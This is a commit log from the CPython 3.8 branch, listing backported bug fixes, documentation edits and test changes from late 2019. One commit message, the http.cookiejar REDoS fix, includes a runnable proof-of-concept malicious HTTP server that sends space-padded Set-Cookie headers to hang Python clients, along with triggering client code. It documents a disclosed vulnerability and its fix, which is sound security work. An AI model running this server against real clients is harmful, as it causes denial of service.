Commit Graph

105428 Commits

Author SHA1 Message Date
Miss Islington (bot) e21aa61e96
bpo-38698: Prevent UnboundLocalError to pop up in parse_message_id (GH-17277)
parse_message_id() was improperly using a token defined inside an exception
handler, which was raising `UnboundLocalError` on parsing an invalid value.

https://bugs.python.org/issue38698
(cherry picked from commit bb815499af)

Co-authored-by: Claudiu Popa <pcmanticore@gmail.com>
2019-12-05 09:42:01 -08:00
Miss Islington (bot) cfdaf92221
[3.8] bpo-38270: Fix indentation of test_hmac assertions (GH-17446) (GH-17450)
Since c64a1a61e6 two assertions were indented and thus ignored when running test_hmac.

This PR fixes it. As the change is quite trivial I didn't add a NEWS entry.


https://bugs.python.org/issue38270
(cherry picked from commit 894331838b)


Co-authored-by: stratakis <cstratak@redhat.com>


https://bugs.python.org/issue38270



Automerge-Triggered-By: @tiran
2019-12-05 08:51:30 -08:00
Miss Islington (bot) f4a21d3b23
bpo-38965: Fix faulthandler._stack_overflow() on GCC 10 (GH-17467)
Use the "volatile" keyword to prevent tail call optimization
on any compiler, rather than relying on compiler specific pragma.
(cherry picked from commit 8b787964e0)

Co-authored-by: Victor Stinner <vstinner@python.org>
2019-12-04 12:30:31 -08:00
Miss Islington (bot) 68669ef788
bpo-38634: Allow non-apple build to cope with libedit (GH-16986)
The readline module now detects if Python is linked to libedit at runtime
on all platforms.  Previously, the check was only done on macOS.

If Python is used as a library by a binary linking to libedit, the linker
resolves the rl_initialize symbol required by the readline module against
libedit instead of libreadline, which leads to a segfault.

Take advantage of the existing supporting code to have readline module being
compatible with both situations.
(cherry picked from commit 7105319ada)

Co-authored-by: serge-sans-paille <serge.guelton@telecom-bretagne.eu>
2019-12-04 08:21:16 -08:00
Miss Islington (bot) a75cad440a
bpo-33684: json.tool: Use utf-8 for infile and outfile. (GH-17460)
(cherry picked from commit 808769f3a4)

Co-authored-by: Inada Naoki <songofacandy@gmail.com>
2019-12-04 01:57:55 -08:00
Miss Islington (bot) baf07395ea
bpo-27873: Update docstring for multiprocessing.Pool.map (GH-17436)
Update docstring for `multiprocessing.Pool.map` to mention `pool.starmap()`.

Prev PR: https://github.com/python/cpython/pull/17367  @aeros

https://bugs.python.org/issue27873
(cherry picked from commit eb48a451e3)

Co-authored-by: An Long <aisk@users.noreply.github.com>
2019-12-03 15:37:40 -08:00
Miss Islington (bot) 8859fc6294
bpo-38945: UU Encoding: Don't let newline in filename corrupt the output format (GH-17418)
(cherry picked from commit a62ad4730c)

Co-authored-by: Matthew Rollings <1211162+stealthcopter@users.noreply.github.com>
2019-12-02 14:44:44 -08:00
Miss Islington (bot) 9e728806d0
bpo-38815: Accept TLSv3 default in min max test (GH-NNNN) (GH-17437)
Make ssl tests less strict and also accept TLSv3 as the default maximum
version. This change unbreaks test_min_max_version on Fedora 32.

https://bugs.python.org/issue38815
(cherry picked from commit 34864d1cff)

Co-authored-by: torsava <torsava@redhat.com>
2019-12-02 08:34:44 -08:00
Miss Islington (bot) 4f1eaf0280
bpo-38449: Add URL delimiters test cases (GH-16729)
* bpo-38449: Add tricky test cases

* bpo-38449: Reflect codereview
(cherry picked from commit 2fe4c48917)

Co-authored-by: Dong-hee Na <donghee.na92@gmail.com>
2019-12-01 15:24:17 -08:00
Miss Islington (bot) d300c0e845
document threading.Lock.locked() (GH-17427)
(cherry picked from commit fdafa1d0ed)

Co-authored-by: idomic <michael.ido@gmail.com>
2019-12-01 12:14:26 -08:00
Miss Islington (bot) 5f234538ab
Fix typos (GH-17423)
(cherry picked from commit 575d0b46d1)

Co-authored-by: Ofek Lev <ofekmeister@gmail.com>
2019-11-30 21:52:39 -08:00
Jules Lasne (jlasne) 305189ecdc [3.8] Added missing coma after end of list in subprocess.rst (GH-17389)
(cherry picked from commit f25875af42)
2019-11-28 22:47:45 -06:00
Steve Dower b74a6f14b9
bpo-38920: Add audit hooks for when sys.excepthook and sys.unraisablehook are invoked (GH-17392)
Also fixes some potential segfaults in unraisable hook handling.
2019-11-28 08:46:23 -08:00
Tzu-ping Chung 18d8edbbb6 bpo-38928: Remove upgrade_dependencies() from venv doc (GH-17410) 2019-11-28 15:44:08 +00:00
Miss Islington (bot) c0db88f6ab
bpo-38524: clarify example a bit and improve formatting (GH-17406)
(cherry picked from commit 02519f75d1)

Co-authored-by: Tal Einat <taleinat+github@gmail.com>
2019-11-27 21:29:02 -08:00
Miss Islington (bot) d21b8e82dd
bpo-26730: Fix SpooledTemporaryFile data corruption (GH-17400)
SpooledTemporaryFile.rollback() might cause data corruption
when it is in text mode.

Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
(cherry picked from commit ea9835c5d1)

Co-authored-by: Inada Naoki <songofacandy@gmail.com>
2019-11-27 21:23:14 -08:00
Miss Islington (bot) 0f9c9d5328
bpo-38524: document implicit and explicit calling of descriptors' __set_name__ (GH-17364)
(cherry picked from commit 1bddf890e5)

Co-authored-by: Florian Dahlitz <f2dahlitz@freenet.de>
2019-11-27 00:53:52 -08:00
Bruno P. Kinoshita 65c92c5870 [3.8] bpo-38688, shutil.copytree: consume iterator and create list of entries to prevent infinite recursion (GH-17397)
(cherry picked from commit 9bbcbc9f6d)

Co-authored-by: Bruno P. Kinoshita <kinow@users.noreply.github.com>
2019-11-27 12:49:37 +08:00
Terry Jan Reedy a9c86f5e1a
[3.8] bpo-38862: IDLE Strip Trailing Whitespace fixes end newlines (GH-17366)
Extra newlines are removed at the end of non-shell files. If the file only has newlines after stripping other trailing whitespace, all are removed, as is done by patchcheck.py.
(cherry picked from commit 6bf644ec82)

Co-authored-by: Terry Jan Reedy <tjreedy@udel.edu>
2019-11-26 20:13:23 -05:00
Miss Islington (bot) 191f94cca6
bpo-38922: Raise code.__new__ audit event when code object replace() is called (GH-17394)
(cherry picked from commit c7c01ab1e5)

Co-authored-by: Steve Dower <steve.dower@python.org>
2019-11-26 16:46:32 -08:00
Miss Islington (bot) 86d9933cc6
bpo-38892: Improve docs for audit event (GH-17361)
(cherry picked from commit e563a155be)

Co-authored-by: Terry Jan Reedy <tjreedy@udel.edu>
2019-11-26 09:14:48 -08:00
Miss Islington (bot) dadff6f661
Remove use of deprecated `array.fromstring` method (GH-17332)
(cherry picked from commit 386d00cc34)

Co-authored-by: David Coles <coles.david@gmail.com>
2019-11-26 00:38:41 -08:00
Miss Islington (bot) 089387ed1f
bpo-21063: Improve module synopsis for distutils (GH-17363)
(cherry picked from commit f8a6316778)

Co-authored-by: Sanchit Khurana <54467174+GeniusLearner@users.noreply.github.com>
2019-11-25 14:26:43 -08:00
Miss Islington (bot) b9e5547f58
bpo-38686: fix HTTP Digest handling in request.py (GH-17045)
* fix HTTP Digest handling in request.py

There is a bug triggered when server replies to a request with `WWW-Authenticate: Digest` where `qop="auth,auth-int"` rather than mere `qop="auth"`. Having both `auth` and `auth-int` is legitimate according to the `qop-options` rule in §3.2.1 of [[https://www.ietf.org/rfc/rfc2617.txt|RFC 2617]]:
>      qop-options       = "qop" "=" <"> 1GH-qop-value <">
>      qop-value         = "auth" | "auth-int" | token
> **qop-options**: [...] If present, it is a quoted string **of one or more** tokens indicating the "quality of protection" values supported by the server.  The value `"auth"` indicates authentication; the value `"auth-int"` indicates authentication with integrity protection

This is description confirmed by the definition of the [//n//]`GH-`[//m//]//rule// extended-BNF pattern defined in §2.1 of [[https://www.ietf.org/rfc/rfc2616.txt|RFC 2616]] as 'a comma-separated list of //rule// with at least //n// and at most //m// items'.

When this reply is parsed by `get_authorization`, request.py only tests for identity with `'auth'`, failing to recognize it as one of the supported modes the server announced, and claims that `"qop 'auth,auth-int' is not supported"`.

* 📜🤖 Added by blurb_it.

* bpo-38686 review fix: remember why.

* fix trailing space in Lib/urllib/request.py

Co-Authored-By: Brandt Bucher <brandtbucher@gmail.com>
(cherry picked from commit 14a89c4798)

Co-authored-by: PypeBros <PypeBros@users.noreply.github.com>
2019-11-22 15:36:38 -08:00
Miss Islington (bot) ca5fafc2bb
closes bpo-29275: Remove Y2K reference from time module docs (GH-17321)
The Y2K reference is not needed as it only points out that Python's use
of C standard functions doesn't generally suffer from Y2K issues; the
point regarding conventions for conversion of 2-digit years in
:func:`strptime` is still valid.
(cherry picked from commit 42bc60ead3)

Co-authored-by: Callum Ward <wards.callum@gmail.com>
2019-11-22 09:03:50 -08:00
Miss Islington (bot) a1e1be4c49
bpo-38804: Fix REDoS in http.cookiejar (GH-17157)
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bfb85)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
2019-11-22 06:42:06 -08:00
Miss Islington (bot) c3cd0de9ec bpo-22367: Update test_fcntl.py for spawn process mode (GH-17154) (GH-17252)
(cherry picked from commit 9960230f76)

Co-authored-by: Dong-hee Na <donghee.na92@gmail.com>
2019-11-22 15:15:36 +01:00
Victor Stinner 84c36c152a
bpo-36854: Fix reference counter in PyInit__testcapi() (GH-17338)
Increment properly Py_True/Py_False reference counter for
_testcapi.WITH_PYMALLOC variable.
2019-11-22 13:39:36 +01:00
Miss Islington (bot) 107ed88cde
bpo-38526: Fix zipfile.Path method name to be the correct one (GH-17317)
(cherry picked from commit 65444cf7fe)

Co-authored-by: Claudiu Popa <pcmanticore@gmail.com>
2019-11-21 13:41:20 -08:00
Lisa Roach b2744c1be7 [3.8] bpo-38857: AsyncMock fix for awaitable values and StopIteration fix [3.8] (GH-17269) (#17304)
(cherry picked from commit 046442d02b)

Co-authored-by: Jason Fried <fried@fb.com>
2019-11-21 20:14:32 +02:00
Miss Islington (bot) 9458c5c42b
bpo-37838: get_type_hints for wrapped functions with forward reference (GH-17126)
https://bugs.python.org/issue37838
(cherry picked from commit 0aca3a3a1e)

Co-authored-by: benedwards14 <53377856+benedwards14@users.noreply.github.com>
2019-11-21 09:43:42 -08:00
Miss Islington (bot) 767b42633b
bpo-38875: test_capi: trashcan tests require cpu resource (GH-17314)
test_capi: trashcan tests now require the test "cpu" resource.
(cherry picked from commit 0127bb1c5c)

Co-authored-by: Victor Stinner <vstinner@python.org>
2019-11-21 04:11:44 -08:00
Miss Islington (bot) 23f9be24bc
Update functions.rst (GH-16468)
This PR will make the following changes to the [_Built-in Functions_](https://docs.python.org/3/library/functions.html) chapter of the library documentation:

- improve hyperlinks in Sphinx roles (trailing 's' belong to hyperlinks).

Automerge-Triggered-By: @csabella
(cherry picked from commit d67279147a)

Co-authored-by: Géry Ogam <gery.ogam@gmail.com>
2019-11-20 18:17:51 -08:00
Miss Islington (bot) d5d41d3936
bpo-36277: Add document for pdb debug and retval commands (GH-12872)
https://bugs.python.org/issue36277

Automerge-Triggered-By: @csabella
(cherry picked from commit 9391f6c3ef)

Co-authored-by: Dave Nguyen <dv@dvnguyen.com>
2019-11-20 17:56:26 -08:00
Miss Islington (bot) ac99ea4b30
Removed capital letter in parameter in stdtypes.rst (GH-17218)
Automerge-Triggered-By: @csabella
(cherry picked from commit 6db2fb7c30)

Co-authored-by: Jules Lasne (jlasne) <jules.lasne@gmail.com>
2019-11-20 17:36:46 -08:00
Miss Islington (bot) c5fe339b27
Fixed an incorrect sentence in the docs (GH-17205)
Fixed an incorrect sentence in Doc/c-api/mapping.rst I fell on
while translating the file.

skip issue

Automerge-Triggered-By: @csabella
(cherry picked from commit 06ca2a2be9)

Co-authored-by: Aveheuzed <a.masson555@ntymail.com>
2019-11-20 17:26:30 -08:00
Miss Islington (bot) b762375ba2
bpo-38841: Skip asyncio test_create_datagram_endpoint_existing_sock_unix (GH-17294)
on platforms lacking a functional bind() for named unix domain sockets

https://bugs.python.org/issue38841

Automerge-Triggered-By: @asvetlov
(cherry picked from commit 559bad1a70)

Co-authored-by: xdegaye <xdegaye@gmail.com>
2019-11-20 12:20:25 -08:00
Miss Islington (bot) 836f137f7a
bpo-38821: Fix crash in argparse when using gettext (GH-17192)
(cherry picked from commit be5c79e033)

Co-authored-by: Federico Bond <federicobond@gmail.com>
2019-11-20 05:48:25 -08:00
Miss Islington (bot) daf7a082b2
bpo-38823: Fix refleak in _tracemalloc init error handling (GH-17235)
(cherry picked from commit d51a363a43)

Co-authored-by: Brandt Bucher <brandtbucher@gmail.com>
2019-11-20 02:26:48 -08:00
Miss Islington (bot) 2ea4c37c1e
bpo-38823: Fix refleak in marshal init error path (GH-17260)
(cherry picked from commit 33b671e724)

Co-authored-by: Brandt Bucher <brandtbucher@gmail.com>
2019-11-20 02:16:02 -08:00
Miss Islington (bot) 132243957c
bpo-38636: Fix IDLE tab toggle and file indent width (GH-17008)
These Format menu functions (default shortcuts Alt-T and Alt-U)
were mistakenly disabled in 3.7.5 and 3.8.0.
(cherry picked from commit b8462477bf)

Co-authored-by: Terry Jan Reedy <tjreedy@udel.edu>
2019-11-19 22:37:47 -08:00
Miss Islington (bot) a5ed2fe0ee
bpo-38823: Fix refleaks in faulthandler init error path on Windows (GH-17250)
(cherry picked from commit ac2235432c)

Co-authored-by: Brandt Bucher <brandtbucher@gmail.com>
2019-11-19 15:31:08 -08:00
Miss Islington (bot) 829593a926
bpo-38707: Fix for multiprocessing.Process MainThread.native_id (GH-17088)
This PR implements a fix for `multiprocessing.Process` objects; the error occurs when Processes are created using either `fork` or `forkserver` as the `start_method`.

In these instances, the `MainThread` of the newly created `Process` object retains all attributes from its parent's `MainThread` object, including the `native_id` attribute. The resulting behavior is such that the new process' `MainThread` captures an incorrect/outdated `native_id` (the parent's instead of its own).

This change forces the Process object to update its `native_id` attribute during the bootstrap process.

cc @vstinner

https://bugs.python.org/issue38707

Automerge-Triggered-By: @pitrou
(cherry picked from commit c6b20be85c)

Co-authored-by: Jake Tesler <jake.tesler@gmail.com>
2019-11-19 12:11:20 -08:00
Miss Islington (bot) 6c3b471c8c
bpo-35409: Ignore GeneratorExit in async_gen_athrow_throw (GH-14755)
Ignore `GeneratorExit` exceptions when throwing an exception into the `aclose` coroutine of an asynchronous generator.

https://bugs.python.org/issue35409
(cherry picked from commit 8e0de2a480)

Co-authored-by: Vincent Michel <vxgmichel@gmail.com>
2019-11-19 06:12:06 -08:00
Miss Islington (bot) c749326d24
Add missing comma and period in unittest docs (GH-17211)
Automerge-Triggered-By: @csabella
(cherry picked from commit b1f160a236)

Co-authored-by: Jules Lasne (jlasne) <jules.lasne@gmail.com>
2019-11-19 04:12:58 -08:00
Miss Islington (bot) b5bb3b637c bpo-38807: Add os.PathLike to exception message raised by _check_arg_types (GH-17160) (GH-17249)
(cherry picked from commit fe75b62575)

Co-authored-by: Tomás Farías <tomasfariassantana@gmail.com>
2019-11-18 22:46:10 -08:00
Miss Islington (bot) bec7015dcc
bpo-38622: Ensure ctypes.PyObj_FromPtr audit event passes tuples as a single argument (GH-17243)
(cherry picked from commit dcf1f83de8)

Co-authored-by: Steve Dower <steve.dower@python.org>
2019-11-18 13:59:51 -08:00
Miss Islington (bot) e37767bee1
bpo-38722: Runpy use io.open_code() (GH-17234)
https://bugs.python.org/issue38722

Automerge-Triggered-By: @taleinat
(cherry picked from commit e243bae999)

Co-authored-by: jsnklln <jsnklln@gmail.com>
2019-11-18 13:58:02 -08:00
Miss Islington (bot) 47db7439dd
bpo-38622: Add missing audit events for ctypes module (GH-17158)
(cherry picked from commit 00923c6399)

Co-authored-by: Steve Dower <steve.dower@python.org>
2019-11-18 11:53:34 -08:00
Miss Islington (bot) cbbf1098f3
bpo-38809: Windows build scripts use python.exe from virtual envs (GH-17164)
https://bugs.python.org/issue38809
(cherry picked from commit ee703cbb41)

Co-authored-by: Tal Einat <taleinat+github@gmail.com>
2019-11-18 09:53:21 -08:00